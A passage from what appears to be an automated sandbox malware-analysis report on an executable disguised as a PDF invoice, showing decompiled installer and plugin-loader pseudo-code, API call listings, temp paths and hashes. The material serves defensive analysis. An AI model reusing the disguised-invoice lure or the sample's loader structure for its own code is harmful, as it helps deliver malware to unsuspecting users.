                                                                                                  						E00405B30(_t146);
                                                                                                  					}
                                                                                                  					 *0x7a79f8 = _t167;
                                                                                                  					SetWindowTextW(_t166, _t146);
                                                                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                  					_push("true");
                                                                                                  					E004041F4(_t167);
                                                                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                  					_push(0x14);
                                                                                                  					E004041F4(_t167);
                                                                                                  					E00404229(_t166);
                                                                                                  					_t138 = E00406639(7);
                                                                                                  					if(_t138 == 0) {
                                                                                                  						L53:
                                                                                                  						return E0040425B(_a8, _a12, _a16);
                                                                                                  					} else {
                                                                                                  						 *_t138(_t166, "true");
                                                                                                  						goto L8;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}















































                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404712
                                                                                                  • SetWindowTextW.USER32(00000000,-007A9000), ref: 0040473C
                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004047ED
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004047F8
                                                                                                  • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,-007A9000), ref: 0040482A
                                                                                                  • lstrcatW.KERNEL32(-007A9000,Call), ref: 00404836
                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404848
                                                                                                    • Part of subcall function 004058A5: GetDlgItemTextW.USER32(?,?,00000400,0040487F), ref: 004058B8
                                                                                                    • Part of subcall function 004064F3: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                                                                                    • Part of subcall function 004064F3: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                                                                                    • Part of subcall function 004064F3: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                                                                                    • Part of subcall function 004064F3: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,-007A9000,?,0079FEF0,-007A9000,-007A9000,000003FB,-007A9000), ref: 0040490B
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404926
                                                                                                    • Part of subcall function 00404A7F: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404B20
                                                                                                    • Part of subcall function 00404A7F: wsprintfW.USER32 ref: 00404B29
                                                                                                    • Part of subcall function 00404A7F: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$Call
                                                                                                  • API String ID: 2624150263-3865270459
                                                                                                  • Opcode ID: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
                                                                                                  • Instruction ID: 1a43a6be4abc44de482ff05cd7d85368efa207dbef88ee5e6ca465c7332a2ce1
                                                                                                  • Opcode Fuzzy Hash: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
                                                                                                  • Instruction Fuzzy Hash: B0A1AEF1900209ABDB11AFA5CD45AAFB7B8EF84314F10843BF611B62D1DB7C99418B69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 95%
                                                                                                  			E10001B18() {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed int _v20;
                                                                                                  				WCHAR* _v24;
                                                                                                  				WCHAR* _v28;
                                                                                                  				signed int _v32;
                                                                                                  				signed int _v36;
                                                                                                  				signed int _v40;
                                                                                                  				WCHAR* _v44;
                                                                                                  				signed int _v48;
                                                                                                  				void* _v52;
                                                                                                  				intOrPtr _v56;
                                                                                                  				WCHAR* _t199;
                                                                                                  				signed int _t202;
                                                                                                  				void* _t204;
                                                                                                  				void* _t206;
                                                                                                  				WCHAR* _t208;
                                                                                                  				void* _t216;
                                                                                                  				struct HINSTANCE__* _t217;
                                                                                                  				struct HINSTANCE__* _t218;
                                                                                                  				struct HINSTANCE__* _t220;
                                                                                                  				signed short _t222;
                                                                                                  				struct HINSTANCE__* _t225;
                                                                                                  				struct HINSTANCE__* _t227;
                                                                                                  				void* _t228;
                                                                                                  				intOrPtr* _t229;
                                                                                                  				void* _t240;
                                                                                                  				signed char _t241;
                                                                                                  				signed int _t242;
                                                                                                  				struct HINSTANCE__* _t248;
                                                                                                  				void* _t249;
                                                                                                  				signed int _t251;
                                                                                                  				short* _t253;
                                                                                                  				signed int _t259;
                                                                                                  				void* _t260;
                                                                                                  				signed int _t263;
                                                                                                  				signed int _t266;
                                                                                                  				signed int _t267;
                                                                                                  				signed int _t272;
                                                                                                  				signed int _t273;
                                                                                                  				signed int _t274;
                                                                                                  				signed int _t275;
                                                                                                  				void* _t278;
                                                                                                  				void* _t282;
                                                                                                  				struct HINSTANCE__* _t284;
                                                                                                  				signed int _t287;
                                                                                                  				void _t288;
                                                                                                  				signed int _t289;
                                                                                                  				signed int _t301;
                                                                                                  				signed int _t302;
                                                                                                  				signed short _t308;
                                                                                                  				signed int _t309;
                                                                                                  				WCHAR* _t310;
                                                                                                  				WCHAR* _t312;
                                                                                                  				WCHAR* _t313;
                                                                                                  				struct HINSTANCE__* _t314;
                                                                                                  				void* _t316;
                                                                                                  				signed int _t318;
                                                                                                  				void* _t319;
                                                                                                  
                                                                                                  				_t284 = 0;
                                                                                                  				_v32 = 0;
                                                                                                  				_v36 = 0;
                                                                                                  				_v16 = 0;
                                                                                                  				_v8 = 0;
                                                                                                  				_v40 = 0;
                                                                                                  				_t319 = 0;
                                                                                                  				_v48 = 0;
                                                                                                  				_t199 = E1000121B();
                                                                                                  				_v24 = _t199;
                                                                                                  				_v28 = _t199;
                                                                                                  				_v44 = E1000121B();
                                                                                                  				_t309 = E10001243();
                                                                                                  				_v52 = _t309;
                                                                                                  				_v12 = _t309;
                                                                                                  				while(1) {
                                                                                                  					_t202 = _v32;
                                                                                                  					_v56 = _t202;
                                                                                                  					if(_t202 != _t284 && _t319 == _t284) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_t308 =  *_t309;
                                                                                                  					_t287 = _t308 & 0x0000ffff;
                                                                                                  					_t204 = _t287 - _t284;
                                                                                                  					if(_t204 == 0) {
                                                                                                  						_t33 =  &_v32;
                                                                                                  						 *_t33 = _v32 | 0xffffffff;
                                                                                                  						__eflags =  *_t33;
                                                                                                  						L17:
                                                                                                  						_t206 = _v56 - _t284;
                                                                                                  						if(_t206 == 0) {
                                                                                                  							__eflags = _t319 - _t284;
                                                                                                  							 *_v28 = _t284;
                                                                                                  							if(_t319 == _t284) {
                                                                                                  								_t319 = GlobalAlloc(0x40, 0x1ca4);
                                                                                                  								 *(_t319 + 0x1010) = _t284;
                                                                                                  								 *(_t319 + 0x1014) = _t284;
                                                                                                  							}
                                                                                                  							_t288 = _v36;
                                                                                                  							_t43 = _t319 + 8; // 0x8
                                                                                                  							_t208 = _t43;
                                                                                                  							_t44 = _t319 + 0x808; // 0x808
                                                                                                  							_t310 = _t44;
                                                                                                  							 *_t319 = _t288;
                                                                                                  							_t289 = _t288 - _t284;
                                                                                                  							__eflags = _t289;
                                                                                                  							 *_t208 = _t284;
                                                                                                  							 *_t310 = _t284;
                                                                                                  							 *(_t319 + 0x1008) = _t284;
                                                                                                  							 *(_t319 + 0x100c) = _t284;
                                                                                                  							 *(_t319 + 4) = _t284;
                                                                                                  							if(_t289 == 0) {
                                                                                                  								__eflags = _v28 - _v24;
                                                                                                  								if(_v28 == _v24) {
                                                                                                  									goto L39;
                                                                                                  								}
                                                                                                  								_t316 = 0;
                                                                                                  								GlobalFree(_t319);
                                                                                                  								_t319 = E10001311(_v24);
                                                                                                  								__eflags = _t319 - _t284;
                                                                                                  								if(_t319 == _t284) {
                                                                                                  									goto L39;
                                                                                                  								} else {
                                                                                                  									goto L32;
                                                                                                  								}
                                                                                                  								while(1) {
                                                                                                  									L32:
                                                                                                  									_t240 =  *(_t319 + 0x1ca0);
                                                                                                  									__eflags = _t240 - _t284;
                                                                                                  									if(_t240 == _t284) {
                                                                                                  										break;
                                                                                                  									}
                                                                                                  									_t316 = _t319;
                                                                                                  									_t319 = _t240;
                                                                                                  									__eflags = _t319 - _t284;
                                                                                                  									if(_t319 != _t284) {
                                                                                                  										continue;
                                                                                                  									}
                                                                                                  									break;
                                                                                                  								}
                                                                                                  								__eflags = _t316 - _t284;
                                                                                                  								if(_t316 != _t284) {
                                                                                                  									 *(_t316 + 0x1ca0) = _t284;
                                                                                                  								}
                                                                                                  								_t241 =  *(_t319 + 0x1010);
                                                                                                  								__eflags = _t241 & 0x00000008;
                                                                                                  								if((_t241 & 0x00000008) == 0) {
                                                                                                  									_t242 = _t241 | 0x00000002;
                                                                                                  									__eflags = _t242;
                                                                                                  									 *(_t319 + 0x1010) = _t242;
                                                                                                  								} else {
                                                                                                  									_t319 = E1000158F(_t319);
                                                                                                  									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                                                                  								}
                                                                                                  								goto L39;
                                                                                                  							} else {
                                                                                                  								_t301 = _t289 - 1;
                                                                                                  								__eflags = _t301;
                                                                                                  								if(_t301 == 0) {
                                                                                                  									L28:
                                                                                                  									lstrcpyW(_t208, _v44);
                                                                                                  									L29:
                                                                                                  									lstrcpyW(_t310, _v24);
                                                                                                  									L39:
                                                                                                  									_v12 = _v12 + 2;
                                                                                                  									_v28 = _v24;
                                                                                                  									L63:
                                                                                                  									if(_v32 != 0xffffffff) {
                                                                                                  										_t309 = _v12;
                                                                                                  										continue;
                                                                                                  									}
                                                                                                  									break;
                                                                                                  								}
                                                                                                  								_t302 = _t301 - 1;
                                                                                                  								__eflags = _t302;
                                                                                                  								if(_t302 == 0) {
                                                                                                  									goto L29;
                                                                                                  								}
                                                                                                  								__eflags = _t302 != 1;
                                                                                                  								if(_t302 != 1) {
                                                                                                  									goto L39;
                                                                                                  								}
                                                                                                  								goto L28;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_t206 != 1) {
                                                                                                  							goto L39;
                                                                                                  						}
                                                                                                  						_t248 = _v16;
                                                                                                  						if(_v40 == _t284) {
                                                                                                  							_t248 = _t248 - 1;
                                                                                                  						}
                                                                                                  						 *(_t319 + 0x1014) = _t248;
                                                                                                  						goto L39;
                                                                                                  					}
                                                                                                  					_t249 = _t204 - 0x23;
                                                                                                  					if(_t249 == 0) {
                                                                                                  						__eflags = _t309 - _v52;
                                                                                                  						if(_t309 <= _v52) {
                                                                                                  							L15:
                                                                                                  							_v32 = _t284;
                                                                                                  							_v36 = _t284;
                                                                                                  							goto L17;
                                                                                                  						}
                                                                                                  						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                                                                  						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                                                                  							goto L15;
                                                                                                  						}
                                                                                                  						__eflags = _v32 - _t284;
                                                                                                  						if(_v32 == _t284) {
                                                                                                  							L40:
                                                                                                  							_t251 = _v32 - _t284;
                                                                                                  							__eflags = _t251;
                                                                                                  							if(_t251 == 0) {
                                                                                                  								__eflags = _t287 - 0x2a;
                                                                                                  								if(_t287 == 0x2a) {
                                                                                                  									_v36 = 2;
                                                                                                  									L61:
                                                                                                  									_t309 = _v12;
                                                                                                  									_v28 = _v24;
                                                                                                  									_t284 = 0;
                                                                                                  									__eflags = 0;
                                                                                                  									L62:
                                                                                                  									_t318 = _t309 + 2;
                                                                                                  									__eflags = _t318;
                                                                                                  									_v12 = _t318;
                                                                                                  									goto L63;
                                                                                                  								}
                                                                                                  								__eflags = _t287 - 0x2d;
                                                                                                  								if(_t287 == 0x2d) {
                                                                                                  									L131:
                                                                                                  									__eflags = _t308 - 0x2d;
                                                                                                  									if(_t308 != 0x2d) {
                                                                                                  										L134:
                                                                                                  										_t253 = _t309 + 2;
                                                                                                  										__eflags =  *_t253 - 0x3a;
                                                                                                  										if( *_t253 != 0x3a) {
                                                                                                  											L141:
                                                                                                  											_v28 =  &(_v28[0]);
                                                                                                  											 *_v28 = _t308;
                                                                                                  											goto L62;
                                                                                                  										}
                                                                                                  										__eflags = _t308 - 0x2d;
                                                                                                  										if(_t308 == 0x2d) {
                                                                                                  											goto L141;
                                                                                                  										}
                                                                                                  										_v36 = 1;
                                                                                                  										L137:
                                                                                                  										_v12 = _t253;
                                                                                                  										__eflags = _v28 - _v24;
                                                                                                  										if(_v28 <= _v24) {
                                                                                                  											 *_v44 = _t284;
                                                                                                  										} else {
                                                                                                  											 *_v28 = _t284;
                                                                                                  											lstrcpyW(_v44, _v24);
                                                                                                  										}
                                                                                                  										goto L61;
                                                                                                  									}
                                                                                                  									_t253 = _t309 + 2;
                                                                                                  									__eflags =  *_t253 - 0x3e;
                                                                                                  									if( *_t253 != 0x3e) {
                                                                                                  										goto L134;
                                                                                                  									}
                                                                                                  									_v36 = 3;
                                                                                                  									goto L137;
                                                                                                  								}
                                                                                                  								__eflags = _t287 - 0x3a;
                                                                                                  								if(_t287 != 0x3a) {
                                                                                                  									goto L141;
                                                                                                  								}
                                                                                                  								goto L131;
                                                                                                  							}
                                                                                                  							_t259 = _t251 - 1;
                                                                                                  							__eflags = _t259;
                                                                                                  							if(_t259 == 0) {
                                                                                                  								L74:
                                                                                                  								_t260 = _t287 - 0x22;
                                                                                                  								__eflags = _t260 - 0x55;
                                                                                                  								if(_t260 > 0x55) {
                                                                                                  									goto L61;
                                                                                                  								}
                                                                                                  								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                                                                  									case 0:
                                                                                                  										__ecx = _v24;
                                                                                                  										__edi = _v12;
                                                                                                  										while(1) {
                                                                                                  											__edi = __edi + 1;
                                                                                                  											__edi = __edi + 1;
                                                                                                  											_v12 = __edi;
                                                                                                  											__ax =  *__edi;
                                                                                                  											__eflags = __ax - __dx;
                                                                                                  											if(__ax != __dx) {
                                                                                                  												goto L116;
                                                                                                  											}
                                                                                                  											L115:
                                                                                                  											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                  											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                  												L120:
                                                                                                  												 *__ecx =  *__ecx & 0x00000000;
                                                                                                  												__ebx = E1000122C(_v24);
                                                                                                  												goto L91;
                                                                                                  											}
                                                                                                  											L116:
                                                                                                  											__eflags = __ax;
                                                                                                  											if(__ax == 0) {
                                                                                                  												goto L120;
                                                                                                  											}
                                                                                                  											__eflags = __ax - __dx;
                                                                                                  											if(__ax == __dx) {
                                                                                                  												__edi = __edi + 1;
                                                                                                  												__edi = __edi + 1;
                                                                                                  												__eflags = __edi;
                                                                                                  											}
                                                                                                  											__ax =  *__edi;
                                                                                                  											 *__ecx =  *__edi;
                                                                                                  											__ecx = __ecx + 1;
                                                                                                  											__ecx = __ecx + 1;
                                                                                                  											__edi = __edi + 1;
                                                                                                  											__edi = __edi + 1;
                                                                                                  											_v12 = __edi;
                                                                                                  											__ax =  *__edi;
                                                                                                  											__eflags = __ax - __dx;
                                                                                                  											if(__ax != __dx) {
                                                                                                  												goto L116;
                                                                                                  											}
                                                                                                  											goto L115;
                                                                                                  										}
                                                                                                  									case 1:
                                                                                                  										_v8 = 1;
                                                                                                  										goto L61;
                                                                                                  									case 2:
                                                                                                  										_v8 = _v8 | 0xffffffff;
                                                                                                  										goto L61;
                                                                                                  									case 3:
                                                                                                  										_v8 = _v8 & 0x00000000;
                                                                                                  										_v20 = _v20 & 0x00000000;
                                                                                                  										_v16 = _v16 + 1;
                                                                                                  										goto L79;
                                                                                                  									case 4:
                                                                                                  										__eflags = _v20;
                                                                                                  										if(_v20 != 0) {
                                                                                                  											goto L61;
                                                                                                  										}
                                                                                                  										_v12 = _v12 - 2;
                                                                                                  										__ebx = E1000121B();
                                                                                                  										 &_v12 = E10001A9F( &_v12);
                                                                                                  										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                                                                  										goto L91;
                                                                                                  									case 5:
                                                                                                  										L99:
                                                                                                  										_v20 = _v20 + 1;
                                                                                                  										goto L61;
                                                                                                  									case 6:
                                                                                                  										_push(7);
                                                                                                  										goto L107;
                                                                                                  									case 7:
                                                                                                  										_push(0x19);
                                                                                                  										goto L127;
                                                                                                  									case 8:
                                                                                                  										_push(0x15);
                                                                                                  										goto L127;
                                                                                                  									case 9:
                                                                                                  										_push(0x16);
                                                                                                  										goto L127;
                                                                                                  									case 0xa:
                                                                                                  										_push(0x18);
                                                                                                  										goto L127;
                                                                                                  									case 0xb:
                                                                                                  										_push(5);
                                                                                                  										goto L107;
                                                                                                  									case 0xc:
                                                                                                  										__eax = 0;
                                                                                                  										__eax = 1;
                                                                                                  										goto L85;
                                                                                                  									case 0xd:
                                                                                                  										_push(6);
                                                                                                  										goto L107;
                                                                                                  									case 0xe:
                                                                                                  										_push(2);
                                                                                                  										goto L107;
                                                                                                  									case 0xf:
                                                                                                  										_push(3);
                                                                                                  										goto L107;
                                                                                                  									case 0x10:
                                                                                                  										_push(0x17);
                                                                                                  										L127:
                                                                                                  										_pop(__ebx);
                                                                                                  										goto L92;
                                                                                                  									case 0x11:
                                                                                                  										__eax =  &_v12;
                                                                                                  										__eax = E10001A9F( &_v12);
                                                                                                  										__ebx = __eax;
                                                                                                  										__ebx = __eax + 1;
                                                                                                  										__eflags = __ebx - 0xb;
                                                                                                  										if(__ebx < 0xb) {
                                                                                                  											__ebx = __ebx + 0xa;
                                                                                                  										}
                                                                                                  										goto L91;
                                                                                                  									case 0x12:
                                                                                                  										__ebx = 0xffffffff;
                                                                                                  										goto L92;
                                                                                                  									case 0x13:
                                                                                                  										_v48 = _v48 + 1;
                                                                                                  										_push("true");
                                                                                                  										_pop(__eax);
                                                                                                  										goto L85;
                                                                                                  									case 0x14:
                                                                                                  										__eax = 0;
                                                                                                  										__eflags = 0;
                                                                                                  										goto L85;
                                                                                                  									case 0x15:
                                                                                                  										_push("true");
                                                                                                  										L107:
                                                                                                  										_pop(__eax);
                                                                                                  										L85:
                                                                                                  										__edi = _v16;
                                                                                                  										__ecx =  *(0x1000305c + __eax * 4);
                                                                                                  										__edi = _v16 << 5;
                                                                                                  										__edx = 0;
                                                                                                  										__edi = (_v16 << 5) + __esi;
                                                                                                  										__edx = 1;
                                                                                                  										__eflags = _v8 - 0xffffffff;
                                                                                                  										_v40 = 1;
                                                                                                  										 *(__edi + 0x1018) = __eax;
                                                                                                  										if(_v8 == 0xffffffff) {
                                                                                                  											L87:
                                                                                                  											__ecx = __edx;
                                                                                                  											L88:
                                                                                                  											__eflags = _v8 - __edx;
                                                                                                  											 *(__edi + 0x1028) = __ecx;
                                                                                                  											if(_v8 == __edx) {
                                                                                                  												__eax =  &_v12;
                                                                                                  												__eax = E10001A9F( &_v12);
                                                                                                  												__eax = __eax + 1;
                                                                                                  												__eflags = __eax;
                                                                                                  												_v8 = __eax;
                                                                                                  											}
                                                                                                  											__eax = _v8;
                                                                                                  											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                                  											_t133 = _v16 + 0x81; // 0x81
                                                                                                  											_t133 = _t133 << 5;
                                                                                                  											__eax = 0;
                                                                                                  											__eflags = 0;
                                                                                                  											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                                                                  											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                                  											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                                  											goto L91;
                                                                                                  										}
                                                                                                  										__eflags = __ecx;
                                                                                                  										if(__ecx > 0) {
                                                                                                  											goto L88;
                                                                                                  										}
                                                                                                  										goto L87;
                                                                                                  									case 0x16:
                                                                                                  										_t262 =  *(_t319 + 0x1014);
                                                                                                  										__eflags = _t262 - _v16;
                                                                                                  										if(_t262 > _v16) {
                                                                                                  											_v16 = _t262;
                                                                                                  										}
                                                                                                  										_v8 = _v8 & 0x00000000;
                                                                                                  										_v20 = _v20 & 0x00000000;
                                                                                                  										_v36 - 3 = _t262 - (_v36 == 3);
                                                                                                  										if(_t262 != _v36 == 3) {
                                                                                                  											L79:
                                                                                                  											_v40 = 1;
                                                                                                  										}
                                                                                                  										goto L61;
                                                                                                  									case 0x17:
                                                                                                  										__eax =  &_v12;
                                                                                                  										__eax = E10001A9F( &_v12);
                                                                                                  										__ebx = __eax;
                                                                                                  										__ebx = __eax + 1;
                                                                                                  										L91:
                                                                                                  										__eflags = __ebx;
                                                                                                  										if(__ebx == 0) {
                                                                                                  											goto L61;
                                                                                                  										}
                                                                                                  										L92:
                                                                                                  										__eflags = _v20;
                                                                                                  										_v40 = 1;
                                                                                                  										if(_v20 != 0) {
                                                                                                  											L97:
                                                                                                  											__eflags = _v20 - 1;
                                                                                                  											if(_v20 == 1) {
                                                                                                  												__eax = _v16;
                                                                                                  												__eax = _v16 << 5;
                                                                                                  												__eflags = __eax;
                                                                                                  												 *(__eax + __esi + 0x102c) = __ebx;
                                                                                                  											}
                                                                                                  											goto L99;
                                                                                                  										}
                                                                                                  										_v16 = _v16 << 5;
                                                                                                  										_t141 = __esi + 0x1030; // 0x1030
                                                                                                  										__edi = (_v16 << 5) + _t141;
                                                                                                  										__eax =  *__edi;
                                                                                                  										__eflags = __eax - 0xffffffff;
                                                                                                  										if(__eax <= 0xffffffff) {
                                                                                                  											L95:
                                                                                                  											__eax = GlobalFree(__eax);
                                                                                                  											L96:
                                                                                                  											 *__edi = __ebx;
                                                                                                  											goto L97;
                                                                                                  										}
                                                                                                  										__eflags = __eax - 0x19;
                                                                                                  										if(__eax <= 0x19) {
                                                                                                  											goto L96;
                                                                                                  										}
                                                                                                  										goto L95;
                                                                                                  									case 0x18:
                                                                                                  										goto L61;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							_t263 = _t259 - 1;
                                                                                                  							__eflags = _t263;
                                                                                                  							if(_t263 == 0) {
                                                                                                  								_v16 = _t284;
                                                                                                  								goto L74;
                                                                                                  							}
                                                                                                  							__eflags = _t263 != 1;
                                                                                                  							if(_t263 != 1) {
                                                                                                  								goto L141;
                                                                                                  							}
                                                                                                  							_t266 = _t287 - 0x21;
                                                                                                  							__eflags = _t266;
                                                                                                  							if(_t266 == 0) {
                                                                                                  								_v8 =  ~_v8;
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  							_t267 = _t266 - 0x42;
                                                                                                  							__eflags = _t267;
                                                                                                  							if(_t267 == 0) {
                                                                                                  								L57:
                                                                                                  								__eflags = _v8 - 1;
                                                                                                  								if(_v8 != 1) {
                                                                                                  									_t92 = _t319 + 0x1010;
                                                                                                  									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                                                                                  									__eflags =  *_t92;
                                                                                                  								} else {
                                                                                                  									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                                                                                  								}
                                                                                                  								_v8 = 1;
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  							_t272 = _t267;
                                                                                                  							__eflags = _t272;
                                                                                                  							if(_t272 == 0) {
                                                                                                  								_push(0x20);
                                                                                                  								L56:
                                                                                                  								_pop(1);
                                                                                                  								goto L57;
                                                                                                  							}
                                                                                                  							_t273 = _t272 - 9;
                                                                                                  							__eflags = _t273;
                                                                                                  							if(_t273 == 0) {
                                                                                                  								_push(8);
                                                                                                  								goto L56;
                                                                                                  							}
                                                                                                  							_t274 = _t273 - 4;
                                                                                                  							__eflags = _t274;
                                                                                                  							if(_t274 == 0) {
                                                                                                  								_push("true");
                                                                                                  								goto L56;
                                                                                                  							}
                                                                                                  							_t275 = _t274 - 1;
                                                                                                  							__eflags = _t275;
                                                                                                  							if(_t275 == 0) {
                                                                                                  								_push(0x10);
                                                                                                  								goto L56;
                                                                                                  							}
                                                                                                  							__eflags = _t275 != 0;
                                                                                                  							if(_t275 != 0) {
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  							_push(0x40);
                                                                                                  							goto L56;
                                                                                                  						}
                                                                                                  						goto L15;
                                                                                                  					}
                                                                                                  					_t278 = _t249 - 5;
                                                                                                  					if(_t278 == 0) {
                                                                                                  						__eflags = _v36 - 3;
                                                                                                  						_v32 = 1;
                                                                                                  						_v8 = _t284;
                                                                                                  						_v20 = _t284;
                                                                                                  						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                  						_v40 = _t284;
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  					_t282 = _t278 - 1;
                                                                                                  					if(_t282 == 0) {
                                                                                                  						_v32 = 2;
                                                                                                  						_v8 = _t284;
                                                                                                  						_v20 = _t284;
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  					if(_t282 != 0x16) {
                                                                                                  						goto L40;
                                                                                                  					} else {
                                                                                                  						_v32 = 3;
                                                                                                  						_v8 = 1;
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				GlobalFree(_v52);
                                                                                                  				GlobalFree(_v24);
                                                                                                  				GlobalFree(_v44);
                                                                                                  				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                                                                                  					L161:
                                                                                                  					return _t319;
                                                                                                  				} else {
                                                                                                  					_t216 =  *_t319 - 1;
                                                                                                  					if(_t216 == 0) {
                                                                                                  						_t178 = _t319 + 8; // 0x8
                                                                                                  						_t312 = _t178;
                                                                                                  						__eflags =  *_t312 - _t284;
                                                                                                  						if( *_t312 != _t284) {
                                                                                                  							_t217 = GetModuleHandleW(_t312);
                                                                                                  							__eflags = _t217 - _t284;
                                                                                                  							 *(_t319 + 0x1008) = _t217;
                                                                                                  							if(_t217 != _t284) {
                                                                                                  								L150:
                                                                                                  								_t183 = _t319 + 0x808; // 0x808
                                                                                                  								_t313 = _t183;
                                                                                                  								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                                                                                  								__eflags = _t218 - _t284;
                                                                                                  								 *(_t319 + 0x100c) = _t218;
                                                                                                  								if(_t218 == _t284) {
                                                                                                  									__eflags =  *_t313 - 0x23;
                                                                                                  									if( *_t313 == 0x23) {
                                                                                                  										_t186 = _t319 + 0x80a; // 0x80a
                                                                                                  										_t222 = E10001311(_t186);
                                                                                                  										__eflags = _t222 - _t284;
                                                                                                  										if(_t222 != _t284) {
                                                                                                  											__eflags = _t222 & 0xffff0000;
                                                                                                  											if((_t222 & 0xffff0000) == 0) {
                                                                                                  												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                                                                                  											}
                                                                                                  										}
                                                                                                  									}
                                                                                                  								}
                                                                                                  								__eflags = _v48 - _t284;
                                                                                                  								if(_v48 != _t284) {
                                                                                                  									L157:
                                                                                                  									_t313[lstrlenW(_t313)] = 0x57;
                                                                                                  									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                                                                                  									__eflags = _t220 - _t284;
                                                                                                  									if(_t220 != _t284) {
                                                                                                  										L145:
                                                                                                  										 *(_t319 + 0x100c) = _t220;
                                                                                                  										goto L161;
                                                                                                  									}
                                                                                                  									__eflags =  *(_t319 + 0x100c) - _t284;
                                                                                                  									L159:
                                                                                                  									if(__eflags != 0) {
                                                                                                  										goto L161;
                                                                                                  									}
                                                                                                  									L160:
                                                                                                  									_t197 = _t319 + 4;
                                                                                                  									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                                                                                  									__eflags =  *_t197;
                                                                                                  									goto L161;
                                                                                                  								} else {
                                                                                                  									__eflags =  *(_t319 + 0x100c) - _t284;
                                                                                                  									if( *(_t319 + 0x100c) != _t284) {
                                                                                                  										goto L161;
                                                                                                  									}
                                                                                                  									goto L157;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							_t225 = LoadLibraryW(_t312);
                                                                                                  							__eflags = _t225 - _t284;
                                                                                                  							 *(_t319 + 0x1008) = _t225;
                                                                                                  							if(_t225 == _t284) {
                                                                                                  								goto L160;
                                                                                                  							}
                                                                                                  							goto L150;
                                                                                                  						}
                                                                                                  						_t179 = _t319 + 0x808; // 0x808
                                                                                                  						_t227 = E10001311(_t179);
                                                                                                  						 *(_t319 + 0x100c) = _t227;
                                                                                                  						__eflags = _t227 - _t284;
                                                                                                  						goto L159;
                                                                                                  					}
                                                                                                  					_t228 = _t216 - 1;
                                                                                                  					if(_t228 == 0) {
                                                                                                  						_t176 = _t319 + 0x808; // 0x808
                                                                                                  						_t229 = _t176;
